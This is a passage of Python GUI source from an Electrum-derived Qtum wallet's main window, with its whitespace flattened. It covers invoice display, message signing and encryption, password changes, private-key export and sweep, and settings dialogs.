self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_onchain_invoice(self, invoice: OnchainInvoice): amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit() d = 
WindowModalDialog(self, _("Onchain Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) grid.addWidget(QLabel(amount_str), 1, 1) if len(invoice.outputs) == 1: grid.addWidget(QLabel(_("Address") + ':'), 2, 0) grid.addWidget(QLabel(invoice.get_address()), 2, 1) else: outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs)) grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0) grid.addWidget(QLabel(outputs_str), 2, 1) grid.addWidget(QLabel(_("Description") + ':'), 3, 0) grid.addWidget(QLabel(invoice.message), 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1) if invoice.bip70: pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70)) pr.verify(self.contacts) grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0) grid.addWidget(QLabel(pr.get_requestor()), 5, 1) grid.addWidget(QLabel(_("Signature") + ':'), 6, 0) grid.addWidget(QLabel(pr.get_verify_status()), 6, 1) def do_export(): key = pr.get_id() name = str(key) + '.bip70' fn = getSaveFileName( parent=self, title=_("Save invoice to file"), filename=name, filter="*.bip70", config=self.config, ) if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('BIP70 invoice saved as {}').format(fn)) exportButton = EnterButton(_('Export'), do_export) buttons = Buttons(exportButton, CloseButton(d)) else: buttons = Buttons(CloseButton(d)) vbox.addLayout(grid) vbox.addLayout(buttons) d.exec_() def show_lightning_invoice(self, invoice: LNInvoice): lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP) d = WindowModalDialog(self, _("Lightning Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0) grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit() grid.addWidget(QLabel(amount_str), 1, 1) grid.addWidget(QLabel(_("Description") + ':'), 2, 0) grid.addWidget(QLabel(invoice.message), 2, 1) grid.addWidget(QLabel(_("Hash") + ':'), 3, 0) payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex()) payhash_e.addCopyButton(self.app) payhash_e.setReadOnly(True) vbox.addWidget(payhash_e) grid.addWidget(payhash_e, 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1) vbox.addLayout(grid) invoice_e = ShowQRTextEdit(config=self.config) invoice_e.addCopyButton(self.app) invoice_e.setText(invoice.invoice) vbox.addWidget(invoice_e) vbox.addLayout(Buttons(CloseButton(d),)) d.exec_() def create_console_tab(self): from .console import Console self.console = console = Console() return console def update_console(self): console = self.console console.history = self.wallet.db.get("qt-console-history", []) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 'network': self.network, 'plugins': self.gui_object.plugins, 'window': self, 'config': self.config, 'electrum': electrum, 'daemon': self.gui_object.daemon, 'util': util, 'bitcoin': bitcoin, 'lnutil': lnutil, }) c = commands.Commands( config=self.config, daemon=self.gui_object.daemon, network=self.network, callback=lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args, **kwargs: f(method, args, self.password_dialog, **{**kwargs, 'wallet': 
self.wallet}) for m in dir(c): if m[0]=='_' or m in ['network','wallet','config']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) self.balance_label = QLabel("Loading wallet...") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.update_check_button = QPushButton("") self.update_check_button.setFlat(True) self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor)) self.update_check_button.setIcon(read_QIcon("update.png")) self.update_check_button.hide() sb.addPermanentWidget(self.update_check_button) self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog ) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) ) self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.lightning_button = None if self.wallet.has_lightning() and self.network: self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog) sb.addPermanentWidget(self.lightning_button) self.update_lightning_icon() self.status_button = None if self.network: self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def create_coincontrol_statusbar(self): self.coincontrol_sb = sb = QStatusBar() sb.setSizeGripEnabled(False) #sb.setFixedHeight(3 * char_width_in_lineedit()) sb.setStyleSheet('QStatusBar::item {border: None;} ' + ColorScheme.GREEN.as_stylesheet(True)) self.coincontrol_label = QLabel() self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred) self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse) sb.addWidget(self.coincontrol_label) clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None)) clear_cc_button.setStyleSheet("margin-right: 5px;") sb.addPermanentWidget(clear_cc_button) sb.setVisible(False) return sb def set_coincontrol_msg(self, msg: Optional[str]) -> None: if not msg: self.coincontrol_label.setText("") self.coincontrol_sb.setVisible(False) return self.coincontrol_label.setText(msg) self.coincontrol_sb.setVisible(True) def update_lightning_icon(self): if self.lightning_button is None: return if self.network.lngossip is None: return # display colorful lightning icon to signal connection self.lightning_button.setIcon(read_QIcon("lightning.png")) cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate() # self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}") progress_str = "??%" if progress_percent is not None: progress_str = f"{progress_percent}%" if progress_percent and progress_percent >= 100: self.lightning_button.setMaximumWidth(25) self.lightning_button.setText('') self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced.")) else: self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit()) 
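            # While gossip sync is still in progress the button is widened so
            # the percentage text fits next to the icon.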
self.lightning_button.setText(progress_str) self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n" "Payments are more likely to succeed with a more complete graph.")) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) def change_password_dialog(self): from electrum.storage import StorageEncryptionVersion if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(repr(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(32 * char_width_in_lineedit()) line2 = QLineEdit() line2.setFixedWidth(32 * char_width_in_lineedit()) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_wallet_info(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) vbox = QVBoxLayout() wallet_type = self.wallet.db.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) 
grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) # lightning grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0) if self.wallet.can_have_lightning(): grid.addWidget(QLabel(_('Enabled')), 5, 1) local_nodeid = QLabel(self.wallet.lnworker.node_keypair.pubkey.hex()) local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse) grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0) grid.addWidget(local_nodeid, 6, 1, 1, 3) else: grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1) grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2) vbox.addLayout(grid) labels_clayout = None if self.wallet.is_deterministic(): keystores = self.wallet.get_keystores() ks_stack = QStackedWidget() def select_ks(index): ks_stack.setCurrentIndex(index) # only show the combobox in case multiple accounts are available if len(keystores) > 1: def label(idx, ks): if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'): return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}' else: return _("keystore") + f' {idx+1}' labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())] on_click = lambda clayout: select_ks(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click) vbox.addLayout(labels_clayout.layout()) for ks in keystores: ks_w = QWidget() ks_vbox = QVBoxLayout() ks_vbox.setContentsMargins(0, 0, 0, 0) ks_w.setLayout(ks_vbox) mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config) mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) run_hook('show_xpub_button', mpk_text, ks) der_path_hbox = QHBoxLayout() der_path_hbox.setContentsMargins(0, 0, 0, 0) der_path_hbox.addWidget(QLabel(_("Derivation path") + ':')) der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown")) der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse) der_path_hbox.addWidget(der_path_text) der_path_hbox.addStretch() ks_vbox.addWidget(QLabel(_("Master Public Key"))) ks_vbox.addWidget(mpk_text) ks_vbox.addLayout(der_path_hbox) ks_stack.addWidget(ks_w) select_ks(0) vbox.addWidget(ks_stack) vbox.addStretch(1) btn_export_info = run_hook('wallet_info_buttons', self, dialog) btn_close = CloseButton(dialog) btns = Buttons(btn_export_info, btn_close) vbox.addLayout(btns) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(repr(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase, config=self.config) d.exec_() def show_qrcode(self, 
data, title = _("QR code"), parent=None, *, help_text=None, show_copy_text_btn=False): if not data: return d = QRDialog( data=data, parent=parent or self, title=title, help_text=help_text, show_copy_text_btn=show_copy_text_btn, config=self.config, ) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(repr(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk, config=self.config) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. Not just in Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid Qtum address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid Qtum address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = 
QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def sign_pod(self, address=''): d = WindowModalDialog(self, _('Sign POD')) d.setMinimumSize(450, 300) layout = QGridLayout(d) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 1, 0) layout.addWidget(address_e, 1, 1) staker_e = QLineEdit() layout.addWidget(QLabel(_('Staker')), 2, 0) layout.addWidget(staker_e, 2, 1) pod_e = QTextEdit() pod_e.setAcceptRichText(False) layout.addWidget(QLabel(_('POD')), 3, 0) layout.addWidget(pod_e, 3, 1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign_pod(address_e, staker_e, pod_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def do_sign_pod(self, address_e, staker_e, pod_e): staker = staker_e.text().strip() if not is_hash160(staker): try: addr_type, staker = b58_address_to_hash160(staker) except BaseException: raise Exception('invalid staker address') if addr_type != constants.net.ADDRTYPE_P2PKH: raise Exception('invalid staker address') staker = staker.hex() message_e = QTextEdit() message_e.setText(staker) self.do_sign(address_e, message_e, pod_e) @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, data: Union[str, bytes]) -> 
Union[None, 'PartialTransaction', 'Transaction']: from electrum.transaction import tx_from_any try: return tx_from_any(data) except BaseException as e: self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e)) return def import_channel_backup(self, encrypted: str): if not self.question('Import channel backup?'): return try: self.wallet.lnbackups.import_channel_backup(encrypted) except Exception as e: self.show_error("failed to import backup" + '\n' + str(e)) return def read_tx_from_qrcode(self): from electrum import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except BaseException as e: self.show_error(repr(e)) return if not data: return # if the user scanned a bitcoin URI if str(data).startswith("qtum:"): self.pay_to_URI(data) return if data.startswith('channel_backup:'): self.import_channel_backup(data) return # else if the user scanned an offline signed tx tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self) -> Optional[Transaction]: fileName = getOpenFileName( parent=self, title=_("Select your transaction file"), filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY, config=self.config, ) if not fileName: return try: with open(fileName, "rb") as f: file_content = f.read() # type: Union[str, bytes] except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog( parent=self, title=_('Input raw transaction'), header_layout=_("Transaction:"), ok_label=_("Load transaction"), config=self.config, ) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_text_channel_backup(self): text = text_dialog( parent=self, title=_('Input channel backup'), header_layout=_("Channel Backup:"), ok_label=_("Load backup"), config=self.config, ) if not text: return if text.startswith('channel_backup:'): self.import_channel_backup(text) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except UntrustedServerReturnedError as e: self.logger.info(f"Error getting transaction from network: {repr(e)}") self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui()) return except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + repr(e)) return else: tx = transaction.Transaction(raw_tx) self.show_transaction(tx) @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' 
services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password) private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(repr(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: os.chmod(fileName, 0o600) if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import) def do_export_labels(self): export_meta_gui(self, _('labels'), self.wallet.export_labels) def import_invoices(self): import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update) def export_invoices(self): export_meta_gui(self, _('invoices'), self.wallet.export_invoices) def import_requests(self): import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update) def export_requests(self): export_meta_gui(self, _('requests'), self.wallet.export_requests) def import_contacts(self): import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update) def export_contacts(self): export_meta_gui(self, _('contacts'), self.contacts.export_file) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True, config=self.config) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = 
self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {repr(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address_for_corruption(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise privkeys = get_pk() def on_success(result): coins, keypairs = result outputs = [PartialTxOutput.from_address_and_value(addr, value='!')] self.warn_if_watching_only() self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs) def on_failure(exc_info): self.on_error(exc_info) msg = _('Preparing sweep transaction...') task = lambda: self.network.run_from_another_thread( sweep_preparations(privkeys, self.network)) WaitingDialog(self, msg, task, on_success, on_failure) def _do_import(self, title, header_layout, func): text = text_dialog( parent=self, title=title, header_layout=header_layout, ok_label=_('Import'), allow_multi=True, config=self.config, ) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' 
self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): from .settings_dialog import SettingsDialog d = SettingsDialog(self, self.config) self.alias_received_signal.connect(d.set_alias_color) d.exec_() self.alias_received_signal.disconnect(d.set_alias_color) if self.fx: self.fx.trigger_update() run_hook('close_settings_dialog') if d.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # note that closeEvent is NOT called if the user quits with Ctrl-C self.clean_up() event.accept() def clean_up(self): if self._cleaned_up: return self._cleaned_up = True if self.wallet.thread: self.wallet.thread.stop() self.wallet.thread = None util.unregister_callback(self.on_network) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.db.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.wallet.db.put("qt-console-history", self.console.history[-50:]) if self.qr_window: self.qr_window.close() self.close_wallet() if self._update_check_thread: self._update_check_thread.exit() self._update_check_thread.wait() if self.tray: self.tray = None self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = 